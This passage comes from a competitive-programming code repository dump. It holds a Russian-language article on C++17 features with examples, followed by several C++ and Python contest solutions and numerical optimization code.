v.push_back(forward<Args_1>(arg1)),\n // v.push_back(forward<Args_2>(arg2)),\n // ....\n}\n\nvector<int> v;\npushToVector(v, 1, 4, 5, 8);\n```\n\n* И мой любимый пример:\n\n```\n//C++17\ntemplate<typename... Args>\nvoid readln(Args&... args)\n{\n ((cin >> args), ...);\n}\n\ntemplate<typename... Args>\nvoid writeln(Args... 
args)\n{\n ((cout << args << \" \"), ...);\n}\n\nint x;\ndouble y;\nreadln(x, y); // enter 100 500.1234\nwriteln(x, \"some string\", y); // 100 some string 500.1234\n```\n\n* **Note**: скобки значимы!\n\n### Class template argument deduction (Вывод шаблонных типов)\n\n```\ntemplate<typename T>\nstruct point\n{\n T x;\n T y;\n point(T x, T y) : x(x), y(y) {}\n};\n\n//C++11\npair<int, double> p1 = {14, 17.0}\npoint<int> u = {1, 2};\n\n//C++17\npair p2 = {14, 17.0}\npoint v = {1, 2};\n```\n\nЕсли структура сложная, то есть возможность указать правило вывода самим, например так:\n\n```\ntemplate<typename T, typename U>\nstruct S\n{\n T first;\n U second;\n};\n\n// Мой вывод типа\ntemplate<typename T, typename U>\nS(const T &first, const U &second) -> S<T, U>;\n\n```\n**Note**: компилятор обычно сам может создать правило вывода из конструктора, но в этом примере конструктора нет, поэтому правило вывода написано руками.\n\n### `*this` capture in lambda expressions (Захват `*this` в лямбда-функциях)\n\nЯ не думаю, что это особо полезно в спортивном программировании, но кто знает:\n\n```\nstruct someClass\n{\n int x = 0;\n\n void f() const\n {\n cout << x << '\\n';\n }\n\n void g()\n {\n x++;\n }\n\n // C++14\n void func()\n {\n auto lambda1 = [self = *this]() { self.f(); };\n auto lambda2 = [self = *this]() mutable { self.g(); };\n lambda1();\n lambda2();\n }\n\n // C++17\n void funcNew()\n {\n auto lambda1 = [*this]() { f(); };\n auto lambda2 = [*this]() mutable { g(); };\n lambda1();\n lambda2();\n }\n};\n\n```\n[Статья](https://habrahabr.ru/company/infopulse/blog/341264/) о ключевом слове `mutable`.\n\n### Structured bindings (Структурные связывания?)\n\n* Самое полезное нововведение $---$ синтаксический сахар для декомпозиции объектов.\n\n```\ntemplate<typename T>\nstruct point\n{\n T x;\n T y;\n point(T x, T y) : x(x), y(y) {}\n};\n\nvector<point<int>> points = {{0, 0}, {1, 0}, {1, 1}, {1, 0}};\n//C++11\nfor (auto& point : points)\n{\n int x, y;\n tie(x, y) = 
point;\n //...Какая-то сложная логика с x и y\n}\n\n//C++17\nfor (auto& [x, y] : points)\n{\n //...Какая-то сложная логика с x и y\n}\n```\n\n* Итерирование по map'у:\n\n```\nmap<int, string> m;\nfor (auto [key, value] : m)\n cout << \"key: \" << key << '\\n' << \"value: \" << value << '\\n';\n```\n\n* Хорошим примером использования может служить задача [problem:938D]. Код со структурным связыванием (Алгоритм Дейкстры) становится намного понятнее и читаемее: сравните [submission:35474147] и [submission:35346635].\n\n```\nwhile (!q.empty())\n{\n auto [dist, u] = *q.begin();\n q.erase(q.begin());\n used[u] = true;\n for (auto& [w, v] : g[u])\n if (!used[v] && d[v] > dist + 2 * w)\n q.erase({d[v], v}),\n d[v] = dist + 2 * w,\n q.insert({d[v], v});\n}\n```\n\n### Инициализатор в `if` и `switch`\n\n```\nset<int> s;\n\nif (auto [iter, ok] = s.insert(42); ok)\n{\n //...\n}\nelse\n{\n //`ok` и `iter` доступны в этой области видимости\n}\n//А здесь недоступны\n```\n\n### Новые атрибуты\n\n* `[[fallthrough]]` атрибут сообщает о том, что break в данном месте пропущен намеренно:\n\n```\nint requests, type;\ncin >> requests;\nfor (int q = 0; q < requests; ++q)\n switch (cin >> type; type) //Используем инициализатор в switch\n {\n case 1:\n int l, r;\n cin >> l >> r;\n //Обработаем запрос первого типа\n break;\n case 2:\n [[fallthrough]];\n //Предупреждение компилятора будет подавлено!\n case 3:\n int value;\n cin >> value;\n //Обработаем запрос второго и третьего типа.\n }\n```\n\n* `[[nodiscard]]` атрибут используется, чтобы показать, что возвращаемое значение функции не может быть отброшено. 
Может использоваться на типах.\n\n### std::optional\n\n```\noptional<int> findPath(graph g, int from, int to)\n{\n //Find path from `from` to `to`\n if (d[to] != INF)\n return d[to];\n return {}\n}\n\n//Проверим, что путь существует\nif (auto dist = findPath(...); dist.hasValue())\n cout << dist.value(); //Получим его\nelse\n cout << -1;\n\n//Или сразу используем defaultValue, если значение не было установлено\ncout << findPath(...).value_or(-1); //Выводит расстояние если оно найдено и -1 иначе\n```\n\n### Неконстантное(ый?, ая?) string::data\n\nДля любителей С:\n\n```\nstring str = \"hello\";\nchar *p = str.data();\np[0] = 'H';\ncout << str; // Hello\n```\n\n### Свободные функции std::size, std::data и std::empty\n\nВ добавку к уже существующим свободным функциям std::begin, std::end и другим, появились новые, такие как: std::size, std::data и std::empty:\n\n```\nvector<int> v = { 3, 2, 5, 1, 7, 6 };\n\nsize_t sz = size(v);\nbool empty = empty(v);\nauto ptr = data(v);\n```\n\n### std::clamp\n\nВозвращает `x`, если оно попало в интервал `[low, high]` и ближайшее значение иначе:\n\n```\ncout << clamp(7, 0, 10); //7\ncout << clamp(7, 0, 5); //5\ncout << clamp(7, 10, 50); //10\n```\n\nЯ думаю, что это полезная функция, но будет сложно вспомнить как она называется в течение контеста :)\n\n### GCD and LCM! 
(НОД и НОК)\n\n```\ncout << gcd(24, 60); // 12\ncout << lcm(8, 10); // 40\n```\n\n### Возвращаемое значение у `emplace_back`\n\n```\nvector<int> v = { 1, 2, 3 };\n\nauto &r = v.emplace_back(10);\nr = 42;\n//v теперь содержит {1, 2, 3, 42}\n```\n\n### Функции в std::map:\n\n* Extract (можно даже поменять ключ!!!)\n\n```\nmap<int, string> myMap{ { 1, \"Gennady\" }, { 2, \"Petr\" }, { 3, \"Makoto\" } };\nauto node = myMap.extract(2);\nnode.key() = 42;\nmyMap.insert(move(node));\n\n// myMap: {{1, \"Gennady\"}, {42, \"Petr\"}, {3, \"Makoto\"}};\n```\n\n**Note**: Extract $---$ единственный способ поменять ключ элемента map'а без reallocation(реаллокации?)\n\nАсимптотика: \nextract(key): $O(\\log(N))$ [doc](http://en.cppreference.com/w/cpp/container/map/extract) \nextract(iterator): $O(1)$ amortized [doc](http://en.cppreference.com/w/cpp/container/map/extract)\n\n* Merge\n\n```\nmap<int, string> m1{ { 1, \"aa\" }, { 2, \"bb\" }, { 3, \"cc\" } }; \nmap<int, string> m2{ { 4, \"dd\" }, { 5, \"ee\" }, { 6, \"ff\" } };\nm1.merge(m2);\n// m1: { {1, \"aa\"}, {2, \"bb\"}, {3, \"cc\"}, {4, \"dd\"}, {5, \"ee\"}, {6, \"ff\"} }\n// m2: {}\n```\n\nАсимптотика: $O(N \\log(N + M))$ [doc](http://en.cppreference.com/w/cpp/container/map/merge)\n\n* Раньше, чтобы понять, произошла вставка в map или обновление, необходимо было сначала найти элемент, а потом использовать operator[]. 
Теперь появилась функция insert_or_assign:\n\n```\nmap<int, string> m;\nm.emplace(1, \"aaa\");\nm.emplace(2, \"bbb\");\nm.emplace(3, \"ccc\");\n\nauto [it1, inserted1] = m.insert_or_assign(3, \"ddd\");\ncout << inserted1; // 0\n\nauto [it2, inserted2] = m.insert_or_assign(4, \"eee\");\ncout << inserted2; // 1\n```\n\nАсимптотика: $O(\\log(N))$ [doc](http://en.cppreference.com/w/cpp/container/map/emplace)\n\n### Более строгий порядок вычисления выражений\n\nВ C++17 появились новые правила, более строго определяющие порядок вычисления выражений:\n\n* Постфиксные выражения вычисляются слева направо (в том числе вызовы функций и доступ к членам объектов)\n* Выражения присваивания вычисляются справа налево.\n* Операнды операторов << и >> вычисляются слева направо.\n\nТаким образом, как указывается в предложении к стандарту, в следующих выражениях теперь гарантированно сначала вычисляется a, затем b, затем c:\n\n```\na.b\na->b\na->*b\na(b1, b2, b3)\nb @= a\na[b]\na << b << c\na >> b >> c\n```\n\n**Note**: Порядок вычисления b1, b2, b3 все еще не определен.\n\nP.S.: Все материалы адаптированы мной с примерами [отсюда](https://habrahabr.ru/company/pvs-studio/blog/340014/) \n" }, { "alpha_fraction": 0.43545669317245483, "alphanum_fraction": 0.4492753744125366, "avg_line_length": 36.55696105957031, "blob_id": "ec533835cdbd6450755aac630a41cc18bc2bd2ca", "content_id": "182b90f3dc98ee38f501a10e2e8ac52b61c02998", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2967, "license_type": "no_license", "max_line_length": 928, "num_lines": 79, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.15/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = 
r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"matching\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');}\nstring s[5];\nstring nums[5] = {\n\"*** * *** *** * * *** *** *** *** *** \",\n\"* * * * * * * * * * * * * * \",\n\"* * * *** *** *** *** *** * *** *** \",\n\"* * * * * * * * * * * * * \",\n\"*** * *** *** * *** *** * *** *** \"};\n\nint f(int i)\n{\n for (int asdf = 0; asdf <= 9; asdf++)\n {\n bool ok = true;\n for (int j = 0; j < 5 && ok; j++)\n for (int k = 0; k < 3 && ok; k++)\n if (s[j][i * 4 + k] != nums[j][asdf * 4 + k])\n ok = false;\n if (ok)\n return asdf;\n }\n return -1;\n}\n\nvoid run()\n{\n char c;\n forn(i, 5)\n {\n while (true)\n {\n scanf(\"%c\", &c);\n if (c == ' ' || c == '*')\n s[i] += c; else\n break;\n }\n }\n int n = (s[0].size() + 1) / 4;\n int num = 0, k = 0;\n for (int i = n - 1; i >= 0; i--)\n {\n k = f(i);\n if (k < 0)\n break;\n num = num * 10 + k;\n }\n printf(k < 0 || num % 6 != 0 ? \"BOOM!!\\n\" : \"BEER!!\\n\");\n}\n\nint main()\n{\n // freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n// freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.43683764338493347, "alphanum_fraction": 0.4940652847290039, "avg_line_length": 29.83660125732422, "blob_id": "73905d1977ceca98d913143a4c4d23ea3bcf7f8f", "content_id": "fe9f9143f8d3f4bbddcbcf5bf6a1664a215282a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9436, "license_type": "no_license", "max_line_length": 127, "num_lines": 306, "path": "/Ann/mnogomern2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#include <ctime>\n\n#define MAXN 5\nusing namespace std;\nusing namespace std::placeholders;\n\nstatic const double eps = 0.01;\nstatic const double delta = 0.001;\nstatic const double l = 0;\n\nvoid writeln(pair<double, double> a)\n{\n printf(\"%.7f %.7f\\n\", a.first, a.second);\n}\n\ndouble f(double x1, double x2)\n{\n return x1 * x1 - 8. 
* x1 + x2 * x2;\n}\n\nlong long cnk[MAXN][MAXN];\n\nvoid build_cnk()\n{\n for (int i = 0; i < MAXN; i++)\n cnk[i][0] = 1ll;\n for (int i = 1; i < MAXN; i++)\n for (int j = 1; j < MAXN; j++)\n cnk[i][j] = cnk[i - 1][j] + cnk[i - 1][j - 1];\n}\n\nauto d2f(std::function<double(double, double)> f) -> decltype(f)\n{\n return [f](double x, double y)\n {\n double ans = f(x + delta, y) - f(x, y);\n double t = ans;\n int sign = -1;\n for (int i = 1; i <= MAXN; i++, sign *= -1)\n {\n double tcur = 0;\n for (int j = 0, s = 1; j <= i; j++, s *= -1)\n tcur += s * cnk[i][j] * f(x + delta * (i - j + 1), y);\n t = tcur - t;\n ans += sign * t / (i + 1);\n }\n return ans / delta;\n };\n}\n\nauto df(std::function<double(double)> f) -> decltype(f)\n{\n return bind(d2f([f](double x, double y){return f(x);}), _1, 0);\n}\n\ndouble minimize(std::function<double(double)> f) //Newton method for minimization of one-dimensional function\n{\n for (double x = -df(f)(0) / df(df(f))(0); ; x -= df(f)(x) / df(df(f))(x))\n if (fabs(df(f)(x)) <= eps)\n return x;\n}\n\ndouble fx1(double x1, double x2)\n{\n return df(bind(f, _1, x2))(x1);\n}\n\ndouble fx2(double x1, double x2)\n{\n return df(bind(f, x1, _1))(x2);\n}\n\nbool check(double x1, double x2)\n{\n writeln({x1, x2});\n return (fabs(fx1(x1, x2)) <= eps && fabs(fx2(x1, x2)) <= eps);\n}\n\npair<double, double> coordinateDown()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double x, temp, mn, val;\n while (!check(x1, x2))\n {\n countOfOperations++;\n x1 = minimize(bind(f, _1, x2));\n x2 = minimize(bind(f, x1, _1));\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> gradientDownFragmentation(std::function<double(double, double)> f)\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, x11, x21, t;\n auto fx1 = [&f](double x1, double 
x2){return df(bind(f, _1, x2))(x1);};\n auto fx2 = [&f](double x1, double x2){return df(bind(f, x1, _1))(x2);};\n while (fabs(fx1(x1, x2)) >= eps || fabs(fx2(x1, x2)) >= eps)\n {\n countOfOperations++;\n t = f(x1, x2);\n while (true)\n {\n x11 = x1 - alpha * fx1(x1, x2);\n x21 = x2 - alpha * fx2(x1, x2);\n if (f(x11, x21) > t)\n alpha /= 2;\n else\n break;\n }\n x1 = x11;\n x2 = x21;\n }\n return {x1, x2};\n}\n\npair<double, double> gradientDownConst()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 0.1;\n while (!check(x1, x2))\n {\n countOfOperations++;\n x1 = x1 - alpha * fx1(x1, x2);\n x2 = x2 - alpha * fx2(x1, x2);\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> fastestGradientDown(std::function<double(double, double)> f)\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, x11, x21, f1, f2;\n auto fx1 = [&f](double x1, double x2){return df(bind(f, _1, x2))(x1);};\n auto fx2 = [&f](double x1, double x2){return df(bind(f, x1, _1))(x2);};\n auto fun = [&x1, &x2, &f, &fx1, &fx2](double lambda){return f(x1 - lambda * fx1(x1, x2), x2 - lambda * fx2(x1, x2));};\n while (fabs(fx1(x1, x2)) >= eps || fabs(fx2(x1, x2)) >= eps)\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n alpha = minimize(bind(fun, _1));\n x1 = x1 - alpha * f1;\n x2 = x2 - alpha * f2;\n }\n return {x1, x2};\n}\n\npair<double, double> soprDirection()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 1;\n double start = clock();\n double alpha = 1, beta = 0;\n double f1, f2, p1, p2, f1p, f2p;\n p1 = f1 = fx1(x1, x2);\n p2 = f2 = fx2(x1, x2);\n auto fun = [&x1, &x2, &p1, &p2](double lambda){return f(x1 - lambda * p1, x2 - lambda * p2);};\n alpha = minimize(bind(fun, _1));\n x1 = x1 - alpha * p1;\n x2 = x2 - alpha * p2;\n while (!check(x1, x2))\n 
{\n countOfOperations++;\n f1p = f1;\n f2p = f2;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n beta = (f1 * f1 + f2 * f2) / (f1p * f1p + f2p * f2p);\n p1 = f1 + beta * p1;\n p2 = f2 + beta * p2;\n alpha = minimize(bind(fun, _1));\n if (f(x1, x2) <= f(x1 - alpha * p1, x2 - alpha * p2))\n {\n p1 = f1;\n p2 = f2;\n alpha = minimize(bind(fun, _1));\n }\n x2 = x2 - alpha * p2;\n x1 = x1 - alpha * p1;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> Gradppor()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 1;\n double start = clock();\n double alpha = 1, beta = 0;\n double f1, f2, p1, p2, f1p, f2p, a = 1., b = 0., c = 0., d = 1., q, w, e, r, t, y, u, s, v, h, g, y1, y2;\n auto fun = [&x1, &x2, &p1, &p2](double lambda){return f(x1 - lambda * p1, x2 - lambda * p2);};\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n p1 = a * f1 + b * f2;\n p2 = c * f1 + d * f2;\n alpha = minimize(bind(fun, _1));\n x1 = x1 - alpha * p1;\n x2 = x2 - alpha * p2;\n y1 = fx1(x1, x2) - f1;\n y2 = fx2(x1, x2) - f2;\n q = a * y1 + b * y2;\n w = c * y1 + d * y2;\n u = q * y1 + w * y2;\n e = (q * y1 * a + q * y2 * c) / u;\n r = (q * y1 * b + q * y2 * d) / u;\n t = (w * y1 * a + w * y2 * c) / u;\n y = (w * y1 * b + w * y2 * d) / u;\n u = (p1 * y1 + p2 * y2) / alpha;\n s = (p1 * p1 * a + p1 * p2 * b) / u;\n v = (p1 * p1 * c + p1 * p2 * d) / u;\n h = (p1 * p2 * a + p2 * p2 * b) / u;\n g = (p1 * p2 * c + p2 * p2 * d) / u;\n a = a - e + s;\n b = b - r + v;\n c = c - t + h;\n d = d - y + g;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> newton(std::function<double(double, double)> f)\n{\n double x1 = 0, x2 = 0;\n int countOfOperations = 0;\n double start = clock(), f1, f2, x11, x21;\n double q11, q12, 
q22;\n auto fx1 = [&f](double x1, double x2){return df(bind(f, _1, x2))(x1);};\n auto fx2 = [&f](double x1, double x2){return df(bind(f, x1, _1))(x2);};\n while (fabs(fx1(x1, x2)) >= eps || fabs(fx2(x1, x2)) >= eps)\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n q11 = df(df(bind(f, _1, x2)))(x1);\n q12 = df(bind(d2f(f), x1, _1))(x2);\n q22 = df(df(bind(f, x1, _1)))(x2);\n x1 = x1 - (f1 * q22 - f2 * q12) / (q11 * q22 - q12 * q12);\n x2 = x2 - (-f1 * q12 + f2 * q11) / (q11 * q22 - q12 * q12);\n }\n// cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\ndouble g(double x1, double x2)\n{\n return x1 * x1 + (x2 - 4) * (x2 - 4) - 9;\n}\n\ndouble h(double x1, double x2)\n{\n double mx = max(0., g(x1, x2));\n return mx * mx;\n}\n\npair<double, double> penalty()\n{\n double x1 = 8.0, x2 = 4.;\n int countOfOperations = 0;\n double start = clock(), beta = 1.05, r = 1;\n while (fabs(r * h(x1, x2)) > eps)\n {\n countOfOperations++;\n// auto t = newton([&r](double x1, double x2){return f(x1, x2) + r * h(x1, x2);});\n// auto t = fastestGradientDown([&r](double x1, double x2){return f(x1, x2) + r * h(x1, x2);});\n auto t = gradientDownFragmentation([&r](double x1, double x2){return f(x1, x2) + r * h(x1, x2);});\n writeln({r, r});\n x1 = t.first;\n x2 = t.second;\n r *= beta;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\nint main()\n{\n pair<double, double> temp;\n cout.precision(10);\n build_cnk();\n/* cout << \"coordinate down:\\n\"; temp = coordinateDown(); writeln(temp);\n cout << \"gradient down with const:\\n\"; temp = gradientDownConst(); writeln(temp);\n cout << \"gradient down with fragmentation:\\n\"; temp = gradientDownFragmentation(); writeln(temp);\n cout << \"fastest gradient down:\\n\"; temp = fastestGradientDown(f); writeln(temp);\n cout 
<< \"sopr direction(Fletchera-Rivsa):\\n\"; temp = soprDirection(); writeln(temp);\n cout << \"newton:\\n\"; temp = newton(); writeln(temp);\n cout << \"gradient p poryadka:\\n\"; temp = Gradppor(); writeln(temp);*/\n cout << \"with penalty function:\\n\"; temp = penalty(); writeln(temp);\n return 0;\n}\n" }, { "alpha_fraction": 0.35568276047706604, "alphanum_fraction": 0.38021260499954224, "avg_line_length": 19.74576187133789, "blob_id": "a5c399fa71c4f56cc432777d91060b784c81aed1", "content_id": "ae3810aecbc4a99c8ec4c875c6bd4f270fec5a31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1223, "license_type": "no_license", "max_line_length": 63, "num_lines": 59, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.28/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#define TASKNAME \"\"\n \n#include <bits/stdc++.h>\n \n#define mp make_pair\n#define pb push_back\n#define all(a) (a).begin(), (a).end()\n#define sz(a) (int)a.size()\n#define fst first\n#define snd second\n#define fori(n) for(int i = 0; i < n; ++i)\n#define fori1(n) for(int i = 1; i < n; ++i)\n#define forj(n) for(int j = 0; j < n; ++j)\n \nusing namespace std;\n \nvector <pair <int, int> > ans;\nvector<int> a;\n \nint main()\n{\n // freopen(\"in.in.c\", \"r\", stdin);\n int n;\n cin >> n;\n int x, y, count = 0;\n fori(n)\n {\n cin >> x >> y;\n x -= y;\n a.pb(x);\n if (x > 0)\n count++;\n }\n if (count * 2 > n)\n {\n cout << 0 << \"\\n\";\n return 0;\n }\n fori(n - 1)\n if (a[i] <= 0 && a[i + 1] <= 0 ||\n a[i] > 0 && a[i + 1] <= 0 && a[i] + a[i + 1] > 0 ||\n a[i] <= 0 && a[i + 1] > 0 && a[i] + a[i + 1] > 0)\n ans.pb({i + 1, i + 2}),\n ++i;\n if (count * 2 <= n - ans.size())\n {\n cout << \"-1\\n\";\n return 0;\n }\n else\n {\n int i = 0;\n while (count * 2 <= n - i)\n ++i;\n cout << i << \"\\n\";\n forj(i)\n cout << ans[j].fst << \" \" << ans[j].snd << \"\\n\";\n }\n}" }, { "alpha_fraction": 0.508124053478241, "alphanum_fraction": 
0.5413589477539062, "avg_line_length": 24.547170639038086, "blob_id": "5ce681b570e393819680ecda3ee8d4a08b56840d", "content_id": "f93d664c4f38aa8d408337c36b43e5612a3fe691", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1354, "license_type": "no_license", "max_line_length": 123, "num_lines": 53, "path": "/atcoder/abc162/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <map>\n#include <numeric>\n#include <iomanip>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n int n;\n cin >> n;\n ll sum = 0;\n fori1(n + 1)\n if (i % 3 && i % 5)\n sum += i;\n cout << sum << endl;\n \n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.4472891688346863, "alphanum_fraction": 0.46536144614219666, "avg_line_length": 19.75, "blob_id": "db77df0cf4060fe3d62a21584c2d58637d9421e8", "content_id": "25b369b5127408b857eadf83b34f780b59b3a529", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 664, "license_type": "no_license", "max_line_length": 55, "num_lines": 32, "path": "/CodeForce/gym/101095/Y.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "def f(): return list(map(int, input().split()))\n\nn, t = f()\ne = f()[0]\ncities = []\nans = [0] * n\nok = 0\nfor i in range(n):\n cities.append([])\nfor i in range(e):\n h, p = f()\n cities[h - 1].append(p)\n\nfor i in range(n):\n cities[i] = list(reversed(sorted(cities[i])))\n if i + 1 == t:\n cities[i] = []\n continue\n j = 0\n while j < len(cities[i]) and cities[i][j] > 0:\n if cities[i][j] > 1:\n cities[i] = cities[i][:-(cities[i][j] - 1)]\n # print(cities[i])\n j += 1\n if j < len(cities[i]):\n ok += 1\n ans[i] = j\n\nif ok == 0:\n print(' '.join(map(str, ans)))\nelse:\n print(\"IMPOSSIBLE\")\n" }, { "alpha_fraction": 0.4958063066005707, "alphanum_fraction": 0.5087830424308777, "avg_line_length": 27.209821701049805, "blob_id": "d2a636ad95bcf57aaa991b4105d0d92e53fb0a72", "content_id": "63d553f0d490dbae14259acf8b192ec590f39263", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6319, "license_type": "no_license", "max_line_length": 167, 
"num_lines": 224, "path": "/trains/neerc/neerc.ifmo.ru.train.2016.10.18/G.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define va valarray<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... 
